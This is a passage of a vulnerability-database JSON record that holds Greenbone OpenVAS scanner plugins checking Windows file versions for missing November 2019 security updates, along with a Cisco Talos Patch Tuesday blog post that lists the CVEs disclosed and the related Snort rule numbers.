see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525236\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\Mrxsmb.sys\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3325\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Mrxsmb.sys\",\n file_version:sysVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3325\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:55", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525237", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815837", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525237)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815837\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-0721\",\n \"CVE-2019-11135\", \"CVE-2019-1309\", \"CVE-2019-1310\", \"CVE-2019-1324\",\n \"CVE-2019-1374\", \"CVE-2019-1380\", \"CVE-2019-1381\", \"CVE-2019-1382\",\n \"CVE-2019-1383\", \"CVE-2019-1384\", \"CVE-2019-1385\", \"CVE-2019-1388\",\n \"CVE-2019-1389\", \"CVE-2019-1390\", \"CVE-2019-1391\", \"CVE-2019-1393\",\n \"CVE-2019-1394\", \"CVE-2019-1395\", \"CVE-2019-1396\", \"CVE-2019-1397\",\n \"CVE-2019-1398\", \"CVE-2019-1399\", \"CVE-2019-1405\", \"CVE-2019-1406\",\n \"CVE-2019-1407\", \"CVE-2019-1408\", \"CVE-2019-1409\", \"CVE-2019-1411\",\n \"CVE-2019-1413\", \"CVE-2019-1415\", \"CVE-2019-1416\", \"CVE-2019-1417\",\n \"CVE-2019-1418\", \"CVE-2019-1419\", \"CVE-2019-1420\", \"CVE-2019-1422\",\n \"CVE-2019-1424\", \"CVE-2019-1426\", \"CVE-2019-1428\", \"CVE-2019-1429\",\n \"CVE-2019-1433\", \"CVE-2019-1435\", \"CVE-2019-1436\", \"CVE-2019-1438\",\n \"CVE-2019-1439\", \"CVE-2019-1440\", \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 10:37:52 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525237)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525237\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft Hyper-V Network Switch on a host server fails to properly validate\n input from a privileged user on a guest operating system.\n\n - Windows Installer improperly handles certain filesystem operations.\n\n - Windows Error Reporting (WER) improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles IPv6 flowlabel filled in packets.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Universal Plug and Play (UPnP) service improperly allows COM object\n creation.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows Graphics Component improperly handles objects in memory.\n\n - Scripting engine improperly handles objects in memory in Microsoft Edge\n (HTML-based).\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, elevate privileges on an affected system\n and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525237\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer)\n exit(0);\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.1129\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.1129\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:48", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4523205", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815835", "title": "Microsoft Windows Multiple Vulnerabilities (KB4523205)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815835\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-0721\",\n \"CVE-2019-11135\", \"CVE-2019-1309\", \"CVE-2019-1310\", \"CVE-2019-1324\",\n \"CVE-2019-1374\", \"CVE-2019-1379\", \"CVE-2019-1380\", \"CVE-2019-1381\",\n \"CVE-2019-1382\", \"CVE-2019-1383\", \"CVE-2019-1384\", \"CVE-2019-1385\",\n \"CVE-2019-1388\", \"CVE-2019-1390\", \"CVE-2019-1391\", \"CVE-2019-1393\",\n \"CVE-2019-1394\", \"CVE-2019-1395\", \"CVE-2019-1396\", \"CVE-2019-1397\",\n \"CVE-2019-1398\", \"CVE-2019-1399\", \"CVE-2019-1405\", \"CVE-2019-1406\",\n \"CVE-2019-1408\", \"CVE-2019-1409\", \"CVE-2019-1411\", \"CVE-2019-1413\",\n \"CVE-2019-1415\", \"CVE-2019-1416\", \"CVE-2019-1417\", \"CVE-2019-1418\",\n \"CVE-2019-1419\", \"CVE-2019-1420\", \"CVE-2019-1422\", \"CVE-2019-1424\",\n \"CVE-2019-1426\", \"CVE-2019-1427\", \"CVE-2019-1428\", \"CVE-2019-1429\",\n \"CVE-2019-1433\", \"CVE-2019-1435\", \"CVE-2019-1436\", \"CVE-2019-1437\",\n \"CVE-2019-1438\", \"CVE-2019-1439\", \"CVE-2019-1440\", \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 09:08:41 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4523205)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4523205\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows DirectWrite improperly discloses the contents of its memory.\n\n - Microsoft Hyper-V Network Switch on a host server fails to properly validate\n input from a privileged user on a guest operating system.\n\n - Windows Installer improperly handles certain filesystem operations.\n\n - Windows Error Reporting (WER) improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles IPv6 flowlabel filled in packets.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Data Sharing Service improperly handles file operations.\n\n - Windows Universal Plug and Play (UPnP) service improperly allows COM object\n creation.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to disclose sensitive information, cause the host server to crash, execute code\n with elevated permissions, elevate privileges and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4523205\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Userenv.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17763.0\", test_version2:\"10.0.17763.830\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Userenv.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17763.0 - 10.0.17763.830\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:40", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525243", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815722", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815722", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525243)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815722\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-11135\",\n \"CVE-2019-1380\", \"CVE-2019-1381\", \"CVE-2019-1382\", \"CVE-2019-1384\",\n \"CVE-2019-1388\", \"CVE-2019-1389\", \"CVE-2019-1390\", \"CVE-2019-1391\",\n \"CVE-2019-1392\", \"CVE-2019-1393\", \"CVE-2019-1394\", \"CVE-2019-1395\",\n \"CVE-2019-1396\", \"CVE-2019-1397\", \"CVE-2019-1399\", \"CVE-2019-1405\",\n \"CVE-2019-1406\", \"CVE-2019-1407\", \"CVE-2019-1408\", \"CVE-2019-1409\",\n \"CVE-2019-1411\", \"CVE-2019-1412\", \"CVE-2019-1415\", \"CVE-2019-1418\",\n \"CVE-2019-1419\", \"CVE-2019-1422\", \"CVE-2019-1424\", \"CVE-2019-1429\",\n \"CVE-2019-1432\", \"CVE-2019-1433\", \"CVE-2019-1434\", \"CVE-2019-1435\",\n \"CVE-2019-1438\", \"CVE-2019-1439\", \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 11:19:37 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525243)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525243\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Servicing Stack allows access to unprivileged file locations.\n\n - ActiveX Installer service may allow access to files without proper authentication.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privileges, bypass security restrictions,\n disclose sensitive information and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64-based systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525243\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Urlmon.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"11.0.9600.19541\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Urlmon.dll\",\n file_version:dllVer, vulnerable_range:\"Less than 11.0.9600.19541\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-11-17T18:28:30", "bulletinFamily": "blog", "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n \nMicrosoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The [latest Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance>) discloses 75 vulnerabilities, 13 of which are considered \"critical,\" with the rest being deemed \"important.\" \n \nThis month\u2019s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, [CVE-2019-1448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1448>) \u2014a [remote code execution vulnerability](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-microsoft-excel-nov-2019-RCE.html>) in Microsoft Excel. For more on this bug, read our full Vulnerability Spotlight [here](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-microsoft-excel-nov-2019-RCE.html>). We are also [disclosing a remote code execution vulnerability](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-microsoft-media-foundation-nov-2019-RCE.html>) in Microsoft Media Foundation. \n \nTalos also released a new set of SNORT\u24c7 rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2019/11/snort-rule-update-for-nov-12-2019.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed 13 critical vulnerabilities this month, nine of which we will highlight below. \n \n[CVE-2019-0721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0721>), [CVE-2019-1389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1398>), [CVE-2019-1397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1397>) and [CVE-2019-1398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1398>) are all vulnerabilities in Windows Hyper-V that could allow an attacker to remotely execute code on the victim machine. These bugs arise when Hyper-V on a host server improperly validates input from an authenticated user on a guest operating system. An attacker can exploit these vulnerabilities by running a specially crafted application on a guest OS. This could allow a malicious user to escape the hypervisor or a sandbox. \n \n[CVE-2019-1390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1390>) is a remote code execution vulnerability in VBScript. This vulnerability could allow an attacker to corrupt memory in a way that would enable them to execute remote code in the context of the current user. A user could trigger this vulnerability by visiting an attacker-created website while using the Internet Explorer browser, or by opening an Office document or application that contains an ActiveX control marked \"safe for initialization.\" \n \n[CVE-2019-1426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1426>),[ CVE-2019-1427](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1427>), [CVE-2019-1428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1428>) and [CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>) are memory corruption vulnerabilities in the Microsoft Scripting Engine that could lead to remote code execution. The bugs exist in the way the Microsoft Edge web browser handles objects in memory. A user could trigger these vulnerabilities by visiting an attacker-controlled website in Edge. \n \nThe four other critical vulnerabilities are: \n\n\n * [CVE-2019-1373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1373>)\n * [CVE-2019-1419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1419>)\n * [CVE-2019-1430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1430>)\n * [CVE-2019-1441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1441>)\n\n### Important vulnerabilities\n\nThis release also contains 62 important vulnerabilities, one of which we will highlight below. \n \n[CVE-2019-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1020>) is a security feature bypass vulnerability in the Windows secure boot process. An attacker could run a specially crafted application to bypass secure boot and load malicious software. This security update fixes the issue by blocking vulnerable third-party bootloaders. An update also needs to be applied to Windows Defender. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2018-12207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-12207>)\n * [CVE-2019-0712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0712>)\n * [CVE-2019-11135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-11135>)\n * [CVE-2019-1234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1234>)\n * [CVE-2019-1309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1309>)\n * [CVE-2019-1310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1310>)\n * [CVE-2019-1324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1324>)\n * [CVE-2019-1370](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1370>)\n * [CVE-2019-1374](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1374>)\n * [CVE-2019-1379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1379>)\n * [CVE-2019-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1380>)\n * [CVE-2019-1381](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1381>)\n * [CVE-2019-1382](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1382>)\n * [CVE-2019-1383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1383>)\n * [CVE-2019-1384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1384>)\n * [CVE-2019-1385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1385>)\n * [CVE-2019-1388](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388>)\n * [CVE-2019-1391](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1391>)\n * [CVE-2019-1392](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1392>)\n * [CVE-2019-1393](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1393>)\n * [CVE-2019-1394](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1394>)\n * [CVE-2019-1395](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1395>)\n * [CVE-2019-1396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1396>)\n * [CVE-2019-1399](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1399>)\n * [CVE-2019-1402](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1402>)\n * [CVE-2019-1405](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1405>)\n * [CVE-2019-1406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1406>)\n * [CVE-2019-1407](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1407>)\n * [CVE-2019-1408](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1408>)\n * [CVE-2019-1409](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1409>)\n * [CVE-2019-1411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1411>)\n * [CVE-2019-1412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1412>)\n * [CVE-2019-1413](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1413>)\n * [CVE-2019-1415](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1415>)\n * [CVE-2019-1416](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1416>)\n * [CVE-2019-1417](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1417>)\n * [CVE-2019-1418](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1418>)\n * [CVE-2019-1420](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1420>)\n * [CVE-2019-1422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1422>)\n * [CVE-2019-1423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1423>)\n * [CVE-2019-1424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1424>)\n * [CVE-2019-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1425>)\n * [CVE-2019-1432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1432>)\n * [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>)\n * [CVE-2019-1434](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1434>)\n * [CVE-2019-1435](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1435>)\n * [CVE-2019-1436](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1436>)\n * [CVE-2019-1437](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1437>)\n * [CVE-2019-1438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1438>)\n * [CVE-2019-1439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1439>)\n * [CVE-2019-1440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1440>)\n * [CVE-2019-1442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1442>)\n * [CVE-2019-1443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1443>)\n * [CVE-2019-1445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1445>)\n * [CVE-2019-1446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1446>)\n * [CVE-2019-1447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1447>)\n * [CVE-2019-1448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1448>)\n * [CVE-2019-1449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1449>)\n * [CVE-2019-1456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1456>)\n * [CVE-2019-0721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0721>)\n * [CVE-2019-1373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1373>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 46548, 46549, 52205 - 52209, 52212, 52213, 52216, 52217 - 52225, 52228 - 52234, 52239, 52240\n\n", "modified": "2019-11-12T11:58:09", "published": "2019-11-12T11:58:09", "id": "TALOSBLOG:D617C7EFD22C4CD2ECFE1B030BD80B0E", "href": 